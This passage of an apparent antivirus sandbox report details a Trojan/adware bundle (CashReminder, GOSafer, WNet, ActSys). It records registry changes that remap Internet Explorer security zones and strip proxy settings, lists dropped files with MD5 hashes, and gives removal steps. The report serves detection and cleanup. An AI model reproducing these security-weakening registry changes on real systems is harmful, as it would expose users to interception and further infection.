[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "10"
[HKLM\SOFTWARE\CashReminder]
"instid" = "iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "09 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 4C EA 4C 0D D9 83 98 8A 56 49 6F AA CE 7B F6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process CashReminder.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 92 EC 81 5A 8C 87 CA F7 BD 7B B4 FF 71 69 1F"
The process sc.exe:3420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 0A 7C 61 2F 5E 1B 7A 40 6F FD A7 72 9C 67 EE"
The process sc.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AA DC C5 15 43 95 4F B4 CB 0C 6C BA 0C 50 47"
The process GOSafer.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 0F 1C 07 20 99 82 DF C4 28 6A 2F C7 3F DD"
The process GOSafer.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "15"
[HKLM\SOFTWARE\GOSafer]
"instid" = "DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 E9 53 5B 15 46 BB 33 01 3B 58 18 1A C0 56 16"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process WNet.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\WNet]
"instid" = "ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D ED B9 45 D2 70 88 C1 67 43 28 77 A4 33 D4 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process WNet.exe:256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 3B 94 1E FA 7E 1E A7 0E D1 C3 18 5A 1B 24 D6"
The process 310714_is.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A EF 9A 22 6A 05 20 0C 70 D5 52 F7 DD 85 01 85"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 93 74 AB 1E 03 C8 80 36 92 56 66 C3 DE 67 56"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup5755__9664.exe" = "amisetup5755__9664"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
a5bfd6a87161d5dfa81cb5c2c6d29488 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\istartsurf\UninstallManager.exe |
a96619564071df84cc892752df062a6d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe |
3663b55452d8e814f62d6fae8eb32d65 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe |
f94557f8fd41731a3d180383a516fbe3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe |
86efd8c3d12bf831f3d2a7e29fe282aa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe |
fddf4c9d5bdf47f6638a1405cab91044 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe |
1b99adddd28023e61c2a23c13cd855cf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe |
d61776c4928db339475ab6a773585c9d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe |
98c303ebdc2c29766000bc1bbb5e294b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe |
a111ca5040df2e52a27baebb40cdf8f1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup5755__9664.exe |
bbae2d7dac42f4ff6f172bb9ffe0d589 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp |
84bcf3c71e70d5a6e9dc07d70466bdc3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq6.tmp\nsWeb.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\System.dll |
d7a3fa6a6c738b4a3c40d5602af20b08 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\inetc.dll |
84bcf3c71e70d5a6e9dc07d70466bdc3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\nsWeb.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\registry.dll |
d61776c4928db339475ab6a773585c9d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe |
763cabe2b93e8a6ca951370ef5133e53 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] |
fddf4c9d5bdf47f6638a1405cab91044 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] |
1b99adddd28023e61c2a23c13cd855cf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe |
5dbd356bff7e0a10e80866df96d47a78 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe |
7a266046995398d1da3e6c3a98883bd0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] |
98c303ebdc2c29766000bc1bbb5e294b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe |
69bd671e58d7b29ea5493a880668a0e1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe |
86efd8c3d12bf831f3d2a7e29fe282aa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] |
62f09521fa1665b5dbf4dcc444f4584d | c:\Program Files\ActSys\ActSys.exe |
50c806e582580511a38980168445a60f | c:\Program Files\ActSys\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files\ActSys\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files\ActSys\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files\ActSys\nfregdrv.exe |
fb06f6889fe30a3effc5783ca305c59c | c:\Program Files\ActSys\remove_ActSys.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files\ActSys\ssleay32.dll |
072ce8611b64cad10923f3fae7e52eda | c:\Program Files\CashReminder\CashReminder.exe |
d68a76ab1ebbbdde37bb12bd68b1639d | c:\Program Files\CashReminder\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files\CashReminder\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files\CashReminder\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files\CashReminder\nfregdrv.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files\CashReminder\ssleay32.dll |
c7eb85d39abb42efdd7b6c87de25a1dc | c:\Program Files\CashReminder\uninstall.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files\GOSafer\ProtocolFilters.dll |
c1908176b417b29dcfcfc15d7de9de63 | c:\Program Files\GOSafer\gosafer.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files\GOSafer\libeay32.dll |
0e2ca4f2d3f113f006d5801319a626de | c:\Program Files\GOSafer\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files\GOSafer\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files\GOSafer\ssleay32.dll |
e5dc41a4c742155c1af960fdf5e51ed6 | c:\Program Files\GOSafer\uninst.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files\WNet\ProtocolFilters.dll |
45571677457a9bfd49aadada0fd91ca8 | c:\Program Files\WNet\WNet.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files\WNet\libeay32.dll |
8249371485714e1f45a4b1c67002cf47 | c:\Program Files\WNet\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files\WNet\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files\WNet\ssleay32.dll |
f5d2e26b10a2b23d534e16a24375b051 | c:\Program Files\WNet\uninst.exe |
2cf2d758fe1109d055e9857f95a73cf8 | c:\WINDOWS\system32\drivers\asfilterdrv.sys |
e28c3440574068ccc3948d9ed9f3a047 | c:\WINDOWS\system32\drivers\crfilterdrv.sys |
649ac45992f39d9a04f3d629a872bd5c | c:\WINDOWS\system32\drivers\gosaferdrv.sys |
278c3df1efa1e09c4e55e7ddc59ab519 | c:\WINDOWS\system32\drivers\ssfilterdrv.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
net1.exe:976
net1.exe:2596
net1.exe:2220
net1.exe:2588
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
310714_is.tmp:1388
ProtectService.exe:3496
ProtectService.exe:3676
ProtectService.exe:3468
XTab_Setup2121.exe:3372
wpm_v20.0.0.1953_0302.exe:3104
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
net.exe:2552
net.exe:1808
net.exe:2556
net.exe:400
QQBrowser.exe:2908
QQBrowser.exe:2216
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
HPNotify.exe:3664
ActSys.exe:2440
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
cmdshell.exe:3548
amisetup5755__9664.exe:1532
nfregdrv.exe:976
nfregdrv.exe:1540
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
CashReminder.exe:596
sc.exe:3420
sc.exe:3396
GOSafer.exe:2464
GOSafer.exe:2604
WNet.exe:256
310714_is.exe:1880
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
%Program Files%\ActSys\ActSys.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
%Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
%System%\drivers\asfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
%Program Files%\ActSys\remove_ActSys.exe (825 bytes)
%Program Files%\ActSys\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files%\ActSys\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
%Program Files%\ActSys\libeay32.dll (35507 bytes)
%Program Files%\ActSys\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
%Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)
%Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
